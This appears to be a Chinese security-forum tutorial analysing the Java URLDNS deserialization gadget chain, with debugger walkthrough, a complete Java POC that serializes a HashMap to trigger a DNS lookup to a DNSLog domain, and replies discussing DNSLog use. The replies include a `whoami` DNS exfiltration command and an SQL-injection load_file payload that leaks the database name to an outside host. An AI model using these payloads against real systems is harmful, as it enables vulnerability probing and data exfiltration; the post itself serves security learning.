首页
社区
课程
招聘
[原创]URLDNS反序列化利用链
发表于: 2024-8-26 22:46 2622

[原创]URLDNS反序列化利用链

2024-8-26 22:46
2622

0x00 漏洞复现

实验环境

复现步骤

1. 先在DNSLog平台获得一个域名:

2. 使用Deswing工具生成URLDNS的序列化文件:

3. 编写一段反序列化代码:

public class DeserialDemo {
    public static void main(String[] args) throws Exception {
        Object o = deserialize("urldns.bin");    //传入上一步生成的序列化文件全路径
        System.out.println(o);
    }

    private static Object deserialize(String name) throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(name));
        Object o = ois.readObject();
        return o;
    }
}

4. 执行后查看产生了DNSLog记录:


0x01 利用链分析

先来看反序列化后产生的是一个HashMap类型的对象,其中key为URL类型,value是一个String:


在Java反序列化中,如果目标对象定义了readObject方法,则ObjectInputStream在调用readObject方法时,也会反射调用目标对象的readObject方法。

既然我们这里反序列化出的是一个HashMap对象,那我们找找HashMap是否定义了该方法:


果然有,进入这个方法,将断点打到1397行:


这里调用了hash方法,跟进去:


继续调用key.hashCode(),跟进去:


前文提到HashMap对象的key是URL类型,所以这里是调用到了URL的hashCode方法,该方法的逻辑是:如果hashCode不等于-1,则直接返回,否则再调用handler的hashCode方法。点到hashCode的定义处可见其初始值为-1,所以这段逻辑也可理解为:如果hashCode是一个初始化值-1,则需要调用handler的hashCode方法为其赋值,如果不是-1,说明已经赋过值了,直接返回。


继续跟进到handler的hashCode方法里:

执行到这一行时,调用了getHostAddress方法,正是该函数触发了DNS请求。


可以使用Wireshark抓包DNS记录:

很明显我的路由器缓存了域名解析记录,这里的DNS记录是由路由器返回的。


总结利用链:

// HashMap(key, value)
//         URL.hashCode() 初始值-1
//             URLStreamHandler.hashCode


0x02 POC编写

根据前文的分析,先构造一个HashMap对象,key为URL类型,value随意:

URL url = new URL("http://milon.xxx.ceye.io");
Map<URL, Object> map = new HashMap<>();
map.put(url, "hello");

通过反射获取URL对象的hashCode方法,将其设置为-1:

Field hashCodeField = url.getClass().getDeclaredField("hashCode");
hashCodeField.setAccessible(true);
hashCodeField.setInt(url, -1);

定义一个序列化方法并调用:

private static void serializable(Object o, String name) throws IOException {
    ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(name));
    oos.writeObject(o);
}

完整POC:

public class DeserialDemo {
    public static void main(String[] args) throws Exception {
        URL url = new URL("http://milon.xxx.ceye.io");
        Map<URL, Object> map = new HashMap<>();
        map.put(url, "hello");

        Field hashCodeField = url.getClass().getDeclaredField("hashCode");
        hashCodeField.setAccessible(true);
        hashCodeField.setInt(url, -1);

        serializable(map, "urldns.bin");

        Object o = deserialize("urldns.bin");
        System.out.println(o);
    }

    private static Object deserialize(String name) throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(name));
        Object o = ois.readObject();
        return o;
    }

    private static void serializable(Object o, String name) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(name));
        oos.writeObject(o);
    }
}

注意:通过反射设置hashCode为-1,一定要放在map.put调用之后,因为map.put方法也会触发key的hashCode方法,如果先设为-1再调用map.put就会覆写hashCode的值,导致序列化写入的对象hashCode不是-1,那么反序列化时将无法触发DNS查询。


参考

【Java安全-基础】URLDNS反序列化利用链


[课程]Linux pwn 探索篇!

最后于 2024-8-27 15:39 被米龙·0xFFFE编辑 ,原因:
收藏
免费 0
支持
分享
最新回复 (9)
雪    币: 3552
活跃值: (5285)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
除了触发dns的查询请求,有其他什么危害么
2024-8-26 23:24
0
雪    币: 5000
活跃值: (485)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
3
guduzhe 除了触发dns的查询请求,有其他什么危害么
dnslog的作用是可以在域名前添加自定义前缀,这个前缀可以是命令执行结果,比如`whoami`.xxx.io,也可用于sql注入,比如select load_file(concat('\\\\',database(),'.xxx.io\\aax'))
2024-8-27 07:29
0
雪    币: 3552
活跃值: (5285)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
米龙·0xFFFE dnslog的作用是可以在域名前添加自定义前缀,这个前缀可以是命令执行结果,比如`whoami`.xxx.io,也可用于sql注入,比如select load_file(concat('\\\\',d ...
你说的这个是sql注入,场景不一样
2024-8-27 08:10
0
雪    币: 5000
活跃值: (485)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
5
guduzhe 你说的这个是sql注入,场景不一样
不一定非得sql注入,我意思是可以用于信息收集
2024-8-27 08:38
0
雪    币: 49
活跃值: (1961)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
6
米龙·0xFFFE 不一定非得sql注入,我意思是可以用于信息收集
这就是探测用的...你这看来还没学会啊。。就开始瞎说了
2024-8-27 11:27
0
雪    币: 5000
活跃值: (485)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
7
Met三二 这就是探测用的...你这看来还没学会啊。。就开始瞎说了
具体要探测什么,麻烦说详细些
2024-8-27 12:24
0
雪    币: 5000
活跃值: (485)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
8
单说这个利用链,纯粹就是为了验证目标是否存在反序列化漏洞。DNSLog还有其它作用,比如我说的sql注入,或者ping `whoami`.xxx.io可以得到系统用户名。
2024-8-27 13:06
0
雪    币: 49
活跃值: (1961)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
9
米龙·0xFFFE 具体要探测什么,麻烦说详细些
最后于 2024-8-27 14:42 被Met三二编辑 ,原因:
2024-8-27 14:31
0
雪    币: 5000
活跃值: (485)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
10
Met三二 探测反序列用的,而且urldns也和执行命令没有关系吧。`whoami`.xxx.io这和urldns链没关系啊。看来你应该是刚学java吧。。
我也没说`whoami`.xxx.io是urldns链呀,我只说这是dnslog的一种利用方式,dnslog又不是只能用来探测反序列化漏洞
2024-8-27 14:38
0
游客
登录 | 注册 方可回帖
返回
//